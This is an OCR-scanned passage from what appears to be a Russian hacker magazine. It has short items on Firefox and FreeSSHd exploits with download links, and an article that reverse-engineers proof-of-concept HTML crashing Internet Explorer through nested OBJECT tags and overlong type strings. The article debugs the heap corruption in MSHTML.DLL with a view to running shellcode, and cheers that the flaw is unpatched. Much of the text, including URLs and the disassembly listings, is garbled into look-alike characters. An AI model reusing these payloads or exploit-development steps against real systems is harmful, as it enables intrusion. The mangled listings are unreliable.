Советую почаще посещать сайт Интела, 
так как на данный момент способов защиты 
еще не существует. 



Ссылки: 

Прочитать об уязвимости можно по ссылке: 
ѵѵѵѵѵѵ.зесигі1ѵІаЬ.ги/ѵиІпегаЫІі1ѵ/267299.рИр 
Скачать — ѵѵѵѵѵѵ.тіІѵѵОгпп.сопп/ехрІоіІз/1772. 



Злоключение: 

Любая глупость и промашка стоит дорого. 
Думаю, владельцы больших беспроводных 
сетей окажутся, мягко говоря, в неловком 
положении. Если и раньше вардрайверы 
ломали всей вся, то теперь у них будет гото- 
вый инструмент. 



Огееіз: 

Наши благодарности человеку, чье имя 
РиЬеп Запіатаііа (гиЬеп@геѵегзетобе. 
сот). 



Описание: 

Вот так вот, не успели мы написать про 
нашу огненную лису, как выходит еще два 
подряд ЭоЗ Ехріоіі'а. Не везет программис- 
там МолІГы. Советую тебе не тестировать 
эти сплоиты у себя на машине, завалишь 
несчастный компьютер. У меня при тесте 
сплоита для 1.5. 0.3 браузер съел 99% про- 
цессорного времени. 

Что касается сплоита для 1 .5.0.4, он сущес- 
твует благодаря ошибке при обработке 
тэга <тагциее>. Публичная версия сплои- 
та просто валит браузер, однако, по моим 
подозрениям, в приватных кругах есть от- 
мычка, выполняющая произвольный код на 
целевой машине. 



Защита: 

Защита одна — подписаться на новости с 
официального сайта мозилы. Так ты смо- 
жешь не упустить момент, когда появится 
заплатка. 



Ссылки: 

Посмотреть несложный код сплоитов 
можно по ссылкам: ИДр://тіІѵѵОгт.сот/ 
ехрІоіІз/1802 и ѵѵѵѵѵѵ.зесипМаЬ.ги/рос/ 
ех!га/268344.рИр . Слить апдейт можно на 
нашем диске или на ѵѵѵѵѵѵ.тогіііа.ги . 



Злоключение: 

Из-за событий последних дней МогіІІа уже 
рискует обогнать по бажности М3 ІЕ. Конеч- 
но же, не обгонит, однако это большой удар 
по репутации РігеРох. 



Огееіз: 

Описанные сплоиты написали Оіаппі Атаіо 
( ѵѵѵѵѵѵ.аіаппіатаІо.іР ) и пООЬ. 



Описание: 

Сплоит пробивает РгееЗЗРІб 1.0.9 и, как 
говорят, даже другие версии. Сама уязви- 
мость позволяетудаленному пользователю 
выполнить произвольный код на целевой 
системе. Бага возникла из-за ошибки в про- 
верке границ данных, при обработке строки 
алгоритма для обмена ключом, полученным 
от ЗЗРІ-клиента. Удаленный пользователь 
может вызвать переполнение стека и вы- 
полнить произвольный код на целевой сис- 
теме. 



Защита: 

Эксплойт, так же как и уязвимость, отно- 
сительно новый. Вследствие чего заплат- 
ки еще не написаны, и способов решения 
данной проблемы на сегодняшний день не 
существует. 



Ссылки: 

Как всегда, прочитать свежую инфу ты 
можешь по адресу: ѵѵѵѵѵѵ.зесигіІѵІаЬ.ги/ 
ѵиІпегаЫІі1ѵ/267367.рІпр . 

Скачать сплоит можно тут: ѵѵѵѵѵѵ.тіІѵѵОгт. 
сот/ехрІоіІз/1787. 



Злоключение: 

Что ж, владельцам ІгееЗЗРІб будет нелегко. 
Однако вряд ли произойдет какой-нибудь 
глобальный взлом. Поломают немного и за- 
будут. Однако обновить важный демон все 
же необходимо. 



Огееіз: 

РІаписал это чудо Таицеег АИтасІ а. к. а 0х- 
ЗсіепІізІ-хО. 
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КРИС КАСПЕРСКИ 

ака мыщъх 






все 
-старому 



НЕ УСПЕЛА МІСП080РТ ОПРАВИТЬ- 
СЯ ОТ ДЫРЫ В ТЕХТРАЫѲЕО, ЗАПЛАТ- 
КА НА КОТОРУЮ БЫЛА ВЫПУЩЕНА 
1 1 АПРЕЛЯ 2006 ГОДА (ТО ЕСТЬ СПУС- 
ТЯ ЦЕЛЫХ 3 НЕДЕЛИ ПОСЛЕ ПОЯВЛЕ- 
НИЯ ЕХРЬОІТ’А, ОБНАРОДОВАННОГО 
23 МАРТА), КАК РОВНО ЧЕРЕЗ МЕСЯЦ, 
23-ГО АПРЕЛЯ 2006 ГОДА, МІСНАЬ 
2АБЕѴѴЗКІ ОПУБЛИКОВАЛ НА НЕМОДЕ- 
РИРУЕМОМ ФОРУМЕ СРОКОВ СООБ- 
ЩЕНИЕ «МЗІЕ (МЗНТМЬЮЩ ОЕЦЕСТ 
ТАС ѴЦЬЫЕРАВІЫТУ», ОПИСЫВАЮЩЕЕ 
СТРАННОЕ ПОВЕДЕНИЕ ІЕ ПРИ РАБОТЕ 
СО ВЛОЖЕННЫМИ ОЕЦЕСТ’АМИ, И ПРИ- 
ЛОЖИЛ ЧЕТЫРЕ ДЕМОНСТРАЦИОННЫХ 
ЕХРЬОІТА, ГРОХАЮЩИХ, ПО СВИДЕ- 
ТЕЛЬСТВАМ ОЧЕВИДЦЕВ, ВСЕ ВЕРСИИ 
ІЕ: ОТ5.Х ДО 7.Х ВКЛЮЧИТЕЛЬНО. 



Предыстория 

Сообщение МісИаГя не осталось незамеченным, и уже 25-го мар- 
та засветилось на Зесип, где дыре была присвоена наивысшая 
степень опасности, допускающая возможность засылки шелл- 
кода ( зесипіа.сот/абѵізогіез/19762/ ). Аналогичного мнения при- 
держивается и группа “Ргепсй Зесигііу Іпсібепі Пезропзе Теат” 
( ѵѵѵѵѵѵ.ІгзігІ.сот/епаІізИ/абѵізогіез/2006/1507/ ). а вот парни из 
Зесигііу Росиз оказались более сдержанными в своих прогнозах, 
и в графе «сіазз» значится «ипкпоѵѵп» ( ѵѵѵѵѵѵ.зесигіМосиз.сот/ 
Ыб/17820/іпІо ). 

Все остальные (и, в частности, популярный Ыод компании Р- 
Зесиге, расположенный по адресу: ѵѵѵѵѵѵ.І-зесиге.сот/ѵѵеЫоа ) 



сделали вид, что ничего не произошло, тем более никакой ин- 
формации от Місгозоіі еще не поступало. Заплатки нет, и неиз- 
вестно, когда она будет (и будет ли вообще: некоторые ошибки 
Місгозоіі не признает годами). В прошлый раз нас выручали 
сторонние фирмы (достаточно вспоминать йоМіх от Ильфака 
Г ильфанова, затыкающий дыру в ѵѵті), носейчас пользователям 
приходится рассчитывать только на самих себя (или переходить 
на альтернативные браузеры и почтовые клиенты, наиболее за- 
щищенными из которых являются Орега и І_упх, а вот количество 
дыр в РігеРох’е стремительно растет, так что пользоваться им не 
рекомендуется). 

Хакеры торжествуют! Наконец-то появилась серьезная дыра, 
на которую сильные мира сего не обращают внимания. Трудно 
представить, сколько уязвимых машин находится в Сети и какую 
бурную деятельность можно развернуть, если начинить ргооі- 
оі-сопсері ехріоіі зарядом тротила весом в килограмм или даже 
целую тонну. Главное — определить, где именно гробиться ІЕ и 
куда передается управление. Это удачный пример, позволяющий 
продемонстрировать, как работают хакеры. 

Предварительное расследование 

Все эксперименты с ехрІоіГами лучше всего проводить на отде- 
льной машине, запущенной, например, под ѴМ ѴѴаге. Мы будем ис- 
пользовать: ѴѴіпбоѵѵз 2000 ЗР 0 и ІЕ 5.00.2920. Остальные версии 
ІЕ валятся аналогичным способом, отличаясь лишь адресами. 
Запускаем Оперу или РеОе! и сохраняем первый ргооі-оі-сопсері 
ехріоіі на диск: ИДр://ІсатЩРсогебитр.сх/іесІіе2-1 .ИіппІ (в принципе, 
сохранять можно, в том числе и самим ІЕ, но только сохранять, не 
нажимая на ссылку!). Открываем файл в РАРГе по <РЗ> и смотрим, 
что у нас там: 



Хм, просто много вложенных (то есть незакрытых) тэгов ОВ^СТ, 
разделенных загадочным именем Вогк, являющимся к тому же 
торговой маркой компании, производящей бритвы. Ладно, оста- 
вим бритвы в покое и проверим реакцию ехріобег’а. ІЕ 5.0 спокой- 
но переваривает наживку, отображая ее как родную. 



<ЗТѴІ_Ех/ЗТѴІ_Е> 
<ОЕГІЕСТ> Щ 
Вогк И 



<5ТѴІ_Ех/5ТѴІ_Е> 
<ОВ^СТ> Щ 
Вогк 
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Наконец-то появилась серьезная дыра, на которую 
сильные мира сего не обращают внимания. 
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Исходный код ехріоіі’а ІЕсІіе2-З.И1:тІ 



4 



Реакция ІЕ 5.0 на ІЕсІіе2-1 — все отображается нормально 

Со вторым ехріоіі’ом ( ИДр://ІсатШі.согебитр.сх/іесІіе2-2.ІтІтП нам 
везет куда больше. На первый взгляд, все просто замечательно, и, 
за исключением подозрительных пустых квадратов, ІЕ отображает 
его вполне корректно, но вот при закрытии ехріогег’а ІЕ падает с 
воплем о критической ошибке, и в лог доктора Ватсона добавля- 
ется новая запись (естественно, если он установлен фзЫп-Ите 
отладчиком по умолчанию). 

Обычно такое происходит при разрушении динамической памяти 
(так называемой кучи), но не будем спешить с выводами, а посмот- 
рим, чем первый ехріоіі отличается от второго. 
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Реакция ІЕ 5.0 на ІЕсІіе2-2 - падение при закрытии 



Исходный код ехріоіі’а ІЕсІіе2-2.Ы:тІ 



<ОВЗЕСТх/ОВЗЕСТхХ>Вогк</Х> 

<ОВЗЕСТх/ОВЗЕСТхХ>Вогк</Х> 

<ОВ^СТ></ОВ^СТ><Х>Вогк</Х> 



<ЗТУЕЕх/5ТУЕЕ> | 
<0ВЗЕСТ> Щ 
Вогк ■ 



<ЗТѴЦЕх/5ТУЦЕ> | 
<0В^СТ> Щ 
Вогк Г 



<5ТУЕЕх/5ТУЕЕ> | 
<0В^СТ> Щ 
Вогк 



Сначала идет множество корректно закрытых ОВЗЕСТ’ов с неизвес- 
тным ІЕ 5.0 тэгом <Х> — источником тех пустых квадратов, — а вот 
дальше повторяется код предыдущего ехріоіі’а. Но во втором случае 
ІЕ падает, а в первом — нет. Почему? Может, оказалось недостаточно 
уровня вложенности для падения? Открываем іебіе2-1 .ЫтІ в ЕАР’е по 
<Е4> и увеличиваем количество ОВЗЕСТ’ов вдвое-втрое. Загружаем 
его в ІЕ и... вуаля! Ловим исключение при закрытии приложения! На- 
деюсь, мысль ясна? 

Третий ехріоіі ( Ийр://ІсаппЩЕсогебитр.сх/іебіе2-З.Іі1ппП заставляет ІЕ 
глубоко задуматься, в результате чего работа эксплойта в аварийном 
режиме автоматически завершается. Вот оно — переполнение ! 
Смотрим на код. 



<ОВ^СТх/ОЕЕІЕСТхХ>Вогк</Х> 
<ОВ^СТх/ОВ^СТхХ>Вогк</Х> 
<ОВ^СТх/ОВ^СТхХ>Вогк</Х> 
<ОВ^СТх/ОВ^СТхХ>Вогк</Х> | 
<ЗТѴІ_Ех/ЗТѴІ_Е> 



сОВ^СТ іуре=ААААААААААААААААААААААААААААААААА. . 
АААААААААААААААААААААААААААААААААААААААААА> 
Вогк 




<ЗТУЕЕх/5ТУЕЕ> 
сОВ^СТ 

Іуре=ААААААААААААААААААААААААААААААААА. . . АААААААА 
АААААААААААААААААААААААААААААААААА> 

Вогк 




Э-А 

I 



Какой еще «<ОВ^СТх/ОВ^СТхХ>Вогк</Х>»?1 Ведь мы 
же выяснили, что ІЕ обрабатывает его вполне корректно. От- 
крываем файл по <Е4> и отрезаем весь текст вплоть до строки 
“<5ТУЕЕх/5ТУЕЕ>”! Загружаем ехріоі! в ІЕ и... вновь та же задум- 
чивость, заканчивающаяся исключением. Значит, «<ОВЗЕСТ></ 
ОВЗЕСТхХ>Вогк</Х>» тут совсем ни при чем, и реальное пере- 
полнение происходит в «сОВЗЕСТ іуре=ААА...ААА>», в направле- 
нии которого и надо копать. 

Четвертый ехріоі! ( ИДр://ІсатШі.согебитр.сх/іебіе2-4.ИітІ ) во всем 
повторяет третий, только длина строк «ААА» слегка другая, тем не 
менее, исключение все равно возникает, значит, переполнение 
имеет место быть. Остается выяснить, где именно оно происходит 
и как передать шелл-коду бразды правления. 




Реакция ІЕ 5.0 на ІЕсІіе2-2 - 
ражения текста 



- падение в процессе отоб- 



При регистрации ошибки доктор Ватсон 
запоминает время ее возникновения 



:он 



Прил.: 

Время: 



іехріоге.ехе (рісІ=884) 
09.05.2006 @ 16:41 :36.734І 




Начинаем копать 

Свой лог доктор Ватсон хранит в папке ОоситепІз&ЗеШпдз/ 
АН ІІзегз/Документы/ОгѴѴаІзоп, туда же попадает дамп памяти 
упавшего приложения. 

Дамп перезаписывается каждый раз, а лог по умолчанию со- 
храняет данные о 1 0-ти последних ошибках, в которые входят 
и сбои, вызванные нашими ехрІоіГами. 

Открывем бг\д/1зп32.1од в ЕАР’е по <Е4> и ищем строки, относящие- 
ся к сбою в ІЕ, произошедшему в заданное время (мы ведь не забы- 
ли посмотреть на часы, верно?) 

Исключение в приложении: 



Пропуская бесполезную информацию о запущенных процессах и за- 
груженных динамических библиотеках, мы добираемся до дизассемб- 
лерного кода, расположенного в окрестностях сбоя ехріоіі’а іебіе2-2: 
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КЖЖЖі 



^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ 

^Щк .Щв Щв ЩВ ЩВ ЩВ ЩВ ЩВ ЩВ ЩВ 'Щк 'Щк "Щк "Щк "Щк "Щк ЩВ 



Фрагмент дизассемблерного листинга доктора 
Ватсона, описывающего сбой ІЕсІіе2-2 Щ 



х=0000001а еЬх=0000001а есх=01460610 I 
|ебх=7562с198 езі=01460610 е6і=00000000 | 



Іеір=75аб7е2е езр=0006ба58 е6р=00000000 Іор1=0 
пѵ ир еі рі П 2 па ре по | I 




75аб7е23 е81 6000000 


саІІ 


75аб7е28 8668 


тоѵ 


75аб7е2а 3666 


стр 


75а67е2с 740е 


]2 


75а67е2е 867634 


тоѵ 


75а67е31 с1еЮ2 


збг 


75а67е34 36 Гб 


стр 


75а67е36 0*8^431300 


Іпіе 




есІі,[еЬх+0х34] ; <- СБОИ!!! 
ебі,0х2 ■ 
ебі.ебр 
75с0с20Ь I 



РгатеРіг ВеІигпАб Рагат#1 Рагат#2 Рагат#3 Рагат#4 
Рипсііоп ІЧате 

00000000 00000000 00000000 00000000 00000000 00000000 
тзІпітІЮІІѲеЮІаззОЬіесІ I 



Давай попробуем восстановить хронологию событий и выяс- 
нить, что же здесь происходило. Нам известно, что инструкция 
МОѴ ЕОІ, [ЕВХ+0Х34], расположенная по адресу 75А07Е2Е6 и 
лежащая глубоко в недрах МЗНТМІ_ЮІ_І_, вызвала исключение, 
типа нарушения доступа, поскольку регистр ЕВХ содержал 1 АН, 
то есть указывал на первый 64 Кб региона памяти, доступ к ко- 
торому строго запрещен как раз для отлова таких некоррект- 
ных указателей. Но откуда в ЕВХ взялся этот непонятный 1 АН? 
Поднимаясь по дизассемблерному листингу вверх, мы находим 
инструкцию МОѴ ЕВХ, ЕАХ, копирующую содержимое ЕАХ в ЕВХ. 
Значение самого же ЕАХ возвращается функцией ОІІОеіСІаззО 
Ьіес1+0х1І573, расположенной по адресу 75А07Е436. Важно по- 
нять, что к самой ОІКЗеЮІаззОЬіесІ никакого отношения она не 
имеет! Просто, не найдя символьной информации, доктор Ватсон 
взял адрес ближайшей известной ему функции и назначил его в 
качестве базового. 

Кое-что начинает проясняться. Функция 75А07Е436 должна 
возвращать указатель на структуру данных, по смещению 346 
от начала которой лежит еще один указатель, но, накурившись 
ехріоіі’а, она возвратила какую-то фигню. Напоминаю, что сбой 
произошел при закрытии ІЕ, то есть когда обработка НТМБ-кода 
уже была завершена. Следовательно, сама функция 75А07Е436 
тут ни при чем (ее можно даже не дизассемблировать), и причину 
следует искать в разрушении структур данных, с которыми эта 
функция работает. 

Теперь исследуем сбой, относящийся к ІЕ<біе2-3, дизассемблер- 
ные окрестности которого выглядят так: 



Фрагмент дизассемблерного листинга | 
доктора Ватсона, описывающего сбой ІЕбіе2-3 



| еах=00000000 еЬх=000аШ4 есх=00000428 ебх=01 340294 
езі=01 480007 ес!і=01 481 990 



75асс4с1 : 7418 \т 

75асс461 0Ш7се тоѵгх 

75асс464 69с998000000 ітиі 

75асс4ба 868020040000 тоѵ 

75асс4е0 5е рор 

75асс4е8 сЗ геі Ш 



ОІЮеЮІаззО 
есх.зі | 



еах,[еах+0х420] ; <- СБОИ! 
езі I 



РгатеРіг ЯеШгпАб Рагат#1 Рагат#2 Рагат#3 Рагат#4 
Рипсііоп ІЧате 



ОООбйВСС 75А92Р0Р 00000001 00000000 0006РС44 000АР23С 
тзбітІЮІІСеіСІаззОЬфсі I 



Адрес сбоя совсем другой (75АСС40А6 против 75А07Е2Е6), но 
библиотека все та же — МЗНТМІ_ЮІ_І_, да и хронология событий 
очень похожа на предыдущую. Исключение составляет инструкция 
МОѴ ЕАХ,[ЕАХ+0Х420] с регистром ЕАХ, равным нулю, возвращен- 
ным функцией 75А921 1 0б (см. САН 75А921 1 О), которая, по идее, 
должна возвращать указатель на объект или структуру данных, но 
не возвратила, так как память была разрушена! 

Еще у нас имеется дамп изег.бтр, сброшенный ІЕ перед смертью. 
Дамп можно загрузить в отладчик ѴѴіпОЬд (Тііе -> ореп сшзб сіитр), 
входящий в состав ООК, однако ничего нового мы не узнаем. 
Дамп — это мертвое тело, труп программы. Команды трассировки 
в нем не работают, и все, что мы можем, это просматривать память, 
стек и регистры, которые мы и так знаем (спасибо отчету докто- 
ра Ватсона). Большие перспективы открывает дизассемблиро- 
вание МЗНТМІ_ЮІ_1_ и живая отладка по месту падения (фзЫп-ііте 
беЬиддіпд), чем мы сейчас и займемся. 

Роем вглубь 

Берем файл МЗНТМ1_ЮІ_І_ (он находится в каталоге ѴѴІЫЫ1Л 
3узіет32) и загружаем его в ЮА Рго или другой дизассемблер (но 
лучше, чем ЮА Рго, вы все равно ничего не найдете). МісбаІ 2аІеѵѵзкі 
в своем сообщении жаловался на отсутствие исходных текстов, 
серьезно затрудняющие анализ. Что ж, исходных текстов ІЕ в на- 
шем распоряжении действительно нет, но отладочные символы 



Іеір=75асс4ба езр=0006сІЬа0 е6р=0006ббсс Іор1=0 
I па ре пс I 





пѵ ир еі рі П2 I Дамп ІЕ, загруженный в ѴѴіпЮЬд 



функция: <позутЬоІз> 
75асс46б 60 
75асс4Ье 8501 
75асс4с0 56 
75асс4с1 86П 
75асс4сЗ е8555с{сГС 
75асс4с8 6686766с 
75асс4сс 668516 




получить можно. В них содержатся имена всех неэкспортируемых 
функций и объявления объектов и структур. 

ЮА Рго 5.0 автоматически сгружает отладочные символы всех 
системных файлов с тзбі.тісгозоіі.сот . стоит только сказать: 
Іііе -> Іоаб Іііе -> РОВ Іііе. В более древних версиях это при- 
ходится делать вручную. Для начала нам потребуется пакет 
«ОеЬиддіпд Тооіз Іог ѴѴіпсІоѵѵз», бесплатно распространяемый 
МісгозоФ ѵѵѵѵѵѵ.тісгозоіІ.сот/ѵѵббс/беѵІооІз/сІеЬиддіпд/ . Скачи- 
ваем версию для своей операционной системы, устанавливаем, 
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взлом 



Описанная технология позволяет следить за огромным 
числом блоков памяти, практически без снижения 
производительности. Написать и отладить плагин можно 
буквально за вечер. 




Лехі:75АСС4Е9 | 
Лехі:75АСС4Е9 Іос_75АСС4Е9: 
Лех1:75АСС4Е9 
Лехі:75АСС4ЕЕ 
ТехІ:75АСС4ЕР 

ЛехІ:75АСС4ЕЕ зиЬ_75АСС4С0 
Лехі:75АСС4ЕЕ 



тоѵ 

рор 

геіп 

епф 



еах, оІТзеІ: ипк_75С801 АО 
езі ■ 



После загрузки символьной информации (Тііе -> ІоасІІіІе -> РОВ Іііе) листинг 
радикально преображается, и мы получаем вполне осмысленные имена: 



Тот же дизассемблерный текст после загрузки символьной 
информации 



Основное окно дизассемблера ЮА Рго 5.0 по умолчанию. Ну, 
и как с ним работать?! Переход в нормальный режим осу- 
ществляется нажатием на пробел 

заходим в каталог /Ьіп, находим там утилиту зутсбк.ехе и запус- 
каем ее на следующий манер: 



Ручная загрузка символьной информации 




згс=С :\ѴѴІ N М7\ЗѴЗТЕМ32\МЗНТМ І_. ОІ_І_ 



ІзутсГік %згс% /з згѵ*.\*Гійр://тзсІІ.тісгозо^.сот/сІоѵѵпІоасІ/ 
1 зутбоіз -ѵ ■ 



; зігисі ІІ\ІЗТАІ\ІТСІ_А53ІІ\ІЕО * ІЕіізсаІІ С0ІеЗіІе::Ѳе1ІпзІапЮІазз ІпІо(ѵоісІ) 

,іехі:75АСС4С0 ?ѲеІІпзІапЮІаззІпІо@СОІеЗіІе@@ | 
ОАЕРАиіМЗТАМТСІ_АЗЗІІ\ІЕО@@Х2 ргос пеаг | 

ЛехІ:75АСС4С0 ризГі езі | 

.іехі:75АСС4С1 тоѵ езі, есх | 

Техі:75АСС4СЗ саіі ?ОеЮосРіг@ | 

СЕІетеп1@@ОВЕРѴСОос@@Х2;СЕІетеп1:::ОеЮосР1г() 




ЛехІ:75АСС4С8 


тоѵ 


зі, [езі+бСГі] | 




ЛехІ:75АСС4СС 


іезі 


31. зі ■ 




.іехі:75АСС4СЕ 


Р 


зГіогі Іос_75АСС4Е9 




ДехІ:75АСС401 


тоѵгх 


есх, зі Щ 




,іехі:75АСС404 


ітиі 


есх, 98Гі 




ДехІ:75АСС40А 


тоѵ 


еах, [еах+420Гі] ; сбой 


,іехі:75АСС4Е0 


рор 


езі Щ 




,іехі:75АСС4Е1 


Іеа 


еах, [есх+еах-98Гі] 




ЛехІ:75АСС4Е8 


геіп Щ 







Программа лезет в сеть, возбужденно подмигивая огоньками 
модема, и вскоре (или не вскоре — это уж от твоего канала за- 
висит!) на диске образуются два новых каталога: ЛтзИітІ.бЬдХ 
38012257243000 с файлом тзИІтІ.сІЬд и ЛтзИітІ.рбЬ\3805109А2 
с тзИітІ.рбЬ размером 2,8 Мб и 2,1 Мб. На самом деле, файлы 
передаются в сжатом виде, поэтому реально скачивается всего 
~1,5Мб. Ну, бЬд-файл нам совершенно неинтересен (там со- 
держатся адреса машинных команд, соответствующие номерам 
строк исходных текстов, которых у нас все равно нет), а вот рбЬ 
мы сейчас и загрузим в ЮА Рго вместе со всей символьной инфор- 
мацией, которой решила поделиться с нами МісгозоЙ. Перед этим 
рекомендуется скопировать динамическую библиотеку бЬдбеІр.бІІ 
из ОеЬиддіпд Тооіз в корневой каталог ЮА Рго, иначе плагин рбЬ. 
рІ\д/ может не сработать. 

Но прежде чем загружать символы, перейдем на место сбоя и 
посмотрим, как выглядит оригинальный дизассемблерный текст. 
Нажимаем <0> (доіо) и вводим адрес «75АСС40А», сообщенный 
доктором Ватсоном. Мы оказываемся вуже знакомой нам процеду- 
ре, вызывающей безымянную функцию 75А921 1 0б, о назначении 
которой пока можно только гадать: 



,іехі:75АСС4Е9 ■ 

ЛехІ:75АСС4Е9 Іос_75АСС4Е9: | 

,іехі:75АСС4Е9 тоѵ еах, ойзеі ?д_ 

сіЫиІІ@@ЗиСІ_А55ІМЕО@@А ;СІ_АЗЗІІ\ІЕО д_с1Ыи11 
ТехТ75АСС4ЕЕ рор езі Щ 

.ІехІ:75АСС4ЕЕ геіп | 

ДехІ:75АСС4ЕЕ ?ѲеІІпзІапіСІаззІп!о@СОІеЗіІе@@ | 

ОАЕРАУ I ІЧЗТАІЧТ С І_АЗЗ I N ЕО@@Х2 епсір 



Теперь мы знаем, что сбой произошел в функции СОІеЗііе:: 
ОеІІпзІапіСІаззІпІо(ѵоіб), возвращающей указатель на структуру 
ІМЗТАІ\ІТСІ_АЗЗІІ\ІРО. К сожалению, описаний структур в рбЬ-фай- 
ле нет (коварство МісгозоІІ не знает границ!), но даже неполная 
символьная информация намного лучше, чем совсем никакой ! 
Немного побурчав для приличия, займемся дизассемблированием 
функции СЕІетеп1::ОеЮосР!г(ѵоіб), возвратившей в регистре ЕАХ 
ноль, и посмотрим, кто и почему ей сорвал крышу: 



Дизассемблерный текст функции СЕІетепі::ЗеЮосР!г(ѵоісІ) 



Дизассемблерный текст до загрузки символьной информации 



.!ех!:75АСС4С0 зиЬ_75АСС4С0 


ргос пеаг | 






.іехі:75АСС4С0 


ризГі 


езі Щ 




,!ех!:75АСС4С1 


тоѵ 


езі, есх Щ 




.іехі:75АСС4СЗ 


саіі 


зиЬ_75А921Ю 




,1ех!:75АСС4С8 


тоѵ 


зі, [езі+бСГі] 




.!ех1:75АСС4СС 


Іѳзі 


зі, зі 1 




.іехі:75АСС4СЕ 


Р 


зГіогі Іос_75АСС4Е9 




Тех!:75АСС401 


тоѵгх 


есх, зі 1 




,іехі:75АСС404 


ітиі 


есх, 98Гі | 




,!ех1:75АСС40А 


тоѵ 


еах, [еах+420Гі] ; сбой 


,іехі:75АСС4Е0 


рор 


езі Щ 




,іехі:75АСС4Е1 


Іеа 


еах, [есх+еах-98Гі] 




.!ехб75АСС4Е8 


геіп Щ 







Лехі:75А921 Ю ?ОеЮосРІг@СЕІеплепШЮВЕРАѴСОос@@Х2 ргос пеаг 



ТехТ75А921 10 


тоѵ 


еах, [есх+ІОГі] ~| 


.іехі:75А92120 


тоѵ 


есх, [есх+ІСГі] 


Лехі:75А92123 


Іез! 


сі. 2 


,іехі:75А92126 


Р 


зГіогі Іос_75А9212В 


ЛехІ:75А92128 


тоѵ 


еах, [еах+ОСГі] 


,іехі:75А9212В 






Техі:75А9212В Іос_75А9212В: | 






Лех1:75А9212В 


іезі 


сі, 1 


,іехі:75А9212Е 


Р 


зГіогі Іосгеі_75А92133 


ЛехІ:75А92130 


тоѵ 


еах, [еах+2СГі] 


.іехі:75А92133 






Тех1:75А92133 Іосгеі_75А92133: | 






,іехі:75А92133 


геіп | 





.іехі:75А92133 ?ОеЮосРіг@СЕІетепі@@ОВЕРАѴСОос@@Х2 епф 
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Используя регистр ЕСХ, как указатель на объект, она извлекает 
из него еще один указатель, грузит его в ЕАХ, а затем, используя 
полученный ЕАХ как указатель, возвращает в том же самом ЕАХ ука- 
затель на объект, который она должна возвратить. Но в нашем случае 
возвращается ноль, что указывает на разрушение сложной иерархии 
структур данных. 

Дизассемблер не позволяетсказать, на каком этапе произошло разру- 
шение. Может быть разрушен как базовый блок, на который указывает 
ЕСХ, так и блок, расположенный по адресу *(ЕСХ+10Ь). А быть может, 
разрушение произошло еще раньше, но программа рухнула только 
сейчас. Чтобы не гадать на кофейной гуще, воспользуемся іизі-іп- 



О «а 



і~і— і 



| Лизі-іп-ііте отладчик показывает обрушение, 
произошедшее внутри ѲеЮосРіг 




МОѴ ЕАХДѴѴОРЮ РТР 03:[ЕСХ+10] 

МОѴ ЕСХДѴѴОРО РТР 03:[ЕСХ+1С] 

тезт сиг 

ЧЕ ЗНОРТ тзГіітІ.75А9212В 
МОѴ ЕАХДООВй РТР ОЗ:[ЕАХ+0СИ] ; сбой 
ТЕЗТ си 1 

ЛЕ ЗНОРТ тзГіітІ.75А92133 | 

МОѴ ЕАХДѴѴОРй РТР 03:[ЕАХ+2С] 

ВЕТІЧ 



00Е552В4 00000000 
00Е552В8 00000001 
іо тзбітІ.75АСС889 
00Е552ВС РРРРРРРР 
00Е552С0 00000000 



стек -> 


00СШВ9С 


75АСС4С8 


ВЕТІІВІЧ 












00СШВА0 


00Е552В0 






0006РВА4 


75АСС889 


ВЕТІІВІЧІ 


ш 










00СШВА8 


00Е552В0 






00СШВАС 


000ВА054 




<- дамп 


0006РВВ0 


75А9ВРОЗ 


ВЕТІІВІЧ 





00Е552С8 00000000 
00Е552СС РРРРРРРР 
00Е552Э0 00000000 
00Е552О4 00Е55524 
00Е552О8 00000652 
00Е552ОС 00000000 



00СШВВ4 00000004 
00СШВВ8 00000007 
ООСШВВС 000ВА054 
00СШВС0 00000001 | 
00СШВС4 000В9ЕЕ8 
00060ВС8 000В0001 



Нажав <ЗЬііі-Р9>, мы можем проигнорировать исключение и про- 
должить выполнение программы, только ни ей, ни нам лучше от 
этого не станет, ведь структуры данных превратились в бессмыс- 
ленную мешанину байт, и неизвестно, в какой момент они были 
разрушены. 

Приходится реконструировать скелет динозавра буквально по 
косточкам. Прежде всего нам необходимо выяснить, кудауказывал 
ЕСХ в момент вызова ѲеіЭосРіг(). Смотрим на стек: на его вершине 
находится адрес возврата в материнскую процедуру 75АСС4С8Н. 
Ходим сюда дизассемблером (или самим отладчиком по <СТП1_- 
Ѳ>, 75АСС4С8И) и видим, что перед вызовом функции ѲеЮосРіг 
регистр ЕСХ был сохранен в регистре ЕЗІ: 



Исследование материнской функции, вызывающей ѲеЮосРіг 



Сообщение о критической ошибке с предложением запус- 
тить іизі-іп-ііте отладчик 

ііте отладчиком, в роли которого выступит популярный ОІІуЭЬд (ууу\/у\л 
оІІѵбЬа.бе/ У 

Докапываемся до истины 

Запускаем ОІІуОЬд, в меню «орііопз» выбираем пункт «іизі-іп-ііте 
ЬеЬиддіпд» и в появившемся диалоговом окне нажимаем кнопки 
«таке ОІІуОЬд іизі-іп-ііте ЬеЬиддег» и «сопіігт Ьеіоге аііасЬіпд». 
Выходим из отладчика и загружаем ІЕсІіе2-3 в ІЕ. 

Через некоторое время появляется диалоговое окно с сообщени- 
ем, что программа сделала что-то не так. «ОК» — завершает ІЕ, 
«отмена» — запускает іизі-іп-ііте отладчик. 

Очутившись в отладчике, мы оказываемся в уже знакомой нам точ- 
ке сбоя по адресу 75АСС4ЭАЬ. Многократные запуски ІЕ показы- 
вают, что сбои происходят в самых разных местах, но всегда после 
вызова функции ѲеЮосРіг(), а иногда и внутри самой ѲеЮосРіг(). 
Как тебе нравится следующее? 



.іехі:75АСС4С1 

.іехі:75АСС4СЗ 



тоѵ 

саІІ 



езі, есх ■ 
ѲеЮосРіг® 



СЕІетепі@@ОВЕРАѴСОос@@Х2;СЕІетепі::ѲеЮосРІг() 
.іехі:75АСС4С8 тоѵ зі, [езі+бСб] 



Следовательно, в момент сбоя регистр ЕЗІ указывает на структуру, 
из которой загружаются регистры ЕСХ и ЕАХ. Тройным нажатием 
<ТАВ> переходим в окно дампа, нажимаем <СТВІ_-(3> и вводим ре- 
гистр ЕЗІ или его непосредственное значение 00Е552В0И. Это и 
есть та структура данных, с которой мы уже сталкивались в дизас- 
семблере, и которая, судя по карте памяти, лежит где-то в куче (на 
самом деле, ОІІуРЬд не умеет работать с кучей, и необходимо иметь 



рЧМ Ш’Ы Ц"* Кв » ■ ■ 




Й- 



Юзі-іп-ііітіе отладчик показывает обрушение, произошедшее внутри 
ѲеЮосРіг 

